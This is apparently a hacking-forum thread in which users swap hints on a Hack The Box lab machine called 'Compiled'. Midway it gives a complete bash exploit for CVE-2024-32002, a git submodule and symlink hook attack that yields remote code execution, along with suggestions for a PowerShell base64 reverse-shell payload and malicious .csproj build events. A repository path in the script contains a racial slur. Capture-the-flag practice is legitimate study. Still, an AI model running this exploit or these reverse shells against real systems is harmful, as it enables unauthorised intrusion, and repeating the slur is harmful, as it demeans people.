Posts: 30
Threads: 0
Joined: May 2024
(Jul 27, 2024, 09:05 PM)UnkownWombat Wrote: (Jul 27, 2024, 08:58 PM)wtfduw Wrote: Any luck? I got nothing yet
No not yet ;/ i spent a ton of time trying to get the git rce to work but i cant seem to get it working
Same here. Have you checked this? https://amalmurali.me/posts/git-rce/This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 67
Threads: 3
Joined: Jul 2024
(Jul 27, 2024, 09:11 PM)wtfduw Wrote: (Jul 27, 2024, 09:05 PM)UnkownWombat Wrote: (Jul 27, 2024, 08:58 PM)wtfduw Wrote: Any luck? I got nothing yet
No not yet ;/ i spent a ton of time trying to get the git rce to work but i cant seem to get it working
Same here. Have you checked this? https://amalmurali.me/posts/git-rce/
Yeah tried to get it working but thinking I'm doing something wrong.
Posts: 33
Threads: 1
Joined: Apr 2024
Looks like a CVE-2024-32002
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 27, 2024, 09:43 PM)spamdegratis5 Wrote: I think it's related to this https://github.com/cjm00n/EvilSln and here more info https://www.outflank.nl/blog/2023/03/28/...al-access/ (linked in the repo)
I haven't managed to obtain a rev shell yet in the box, but it works on my vm... I'm using PreBuild-Event btw (Project properties, Build Events)
u got now? ........ This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 50
Threads: 1
Joined: Sep 2023
damn this box looks so hard for me !!
Posts: 33
Threads: 3
Joined: Sep 2023
just throwing out a brainstorm but think might need to host your own gitea instance create a malicious .csproj file and upload it to the compiling service running on the victim machine at port 5000 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 28, 2024, 04:15 AM)gihimlek Wrote: (Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote: (Jul 28, 2024, 03:31 AM)gihimlek Wrote: (Jul 28, 2024, 03:18 AM)fuckhackthebox Wrote: register and create empty repos on port 3000
#!/bin/bash
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf repo1
rm -rf repo2
git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git
cd repo1
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
PAYLOAD_HERE
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
adjust accordingly
both repos need to be clean/empty
if you fuck it up then delete the repos recreate them and try again
Payload could be a simple "powershell -e base64revshell" ?
yeah
Nice!
how u got it work bro can u explain This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
I found a file called "pwnd"; its called pwnd so it has to do something somewhere maybe?
Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd
ruycr4ft_was_here
Posts: 67
Threads: 3
Joined: Jul 2024
Jul 28, 2024, 06:17 AM
(This post was last modified: Jul 28, 2024, 06:25 AM by UnkownWombat.)
(Jul 28, 2024, 04:19 AM)gihimlek Wrote: (Jul 28, 2024, 04:17 AM)osamy7593 Wrote: (Jul 28, 2024, 04:15 AM)gihimlek Wrote: (Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote: (Jul 28, 2024, 03:31 AM)gihimlek Wrote: Payload could be a simple "powershell -e base64revshell" ?
yeah
Nice!
how u got it work bro can u explain
Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want
did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manualy and by script
(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; its called pwnd so it has to do something somewhere maybe?
Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd
ruycr4ft_was_here
i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,
could you give me a nudge on shell please 
Posts: 67
Threads: 3
Joined: Jul 2024
(Jul 28, 2024, 06:30 AM)jimmyshoemacher Wrote: (Jul 28, 2024, 06:17 AM)UnkownWombat Wrote: (Jul 28, 2024, 04:19 AM)gihimlek Wrote: (Jul 28, 2024, 04:17 AM)osamy7593 Wrote: (Jul 28, 2024, 04:15 AM)gihimlek Wrote: Nice!
how u got it work bro can u explain
Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want
did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manualy and by script
(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; its called pwnd so it has to do something somewhere maybe?
Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd
ruycr4ft_was_here
i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,
could you give me a nudge on shell please
i have this on a vip machine too w/e it is was left there by creator but I explored some of it and I didn't find anything yet. Might just be nada
i've tried like 4 different methods for the foothold RCE and on ports 443 and 4444, any thoughts?
|
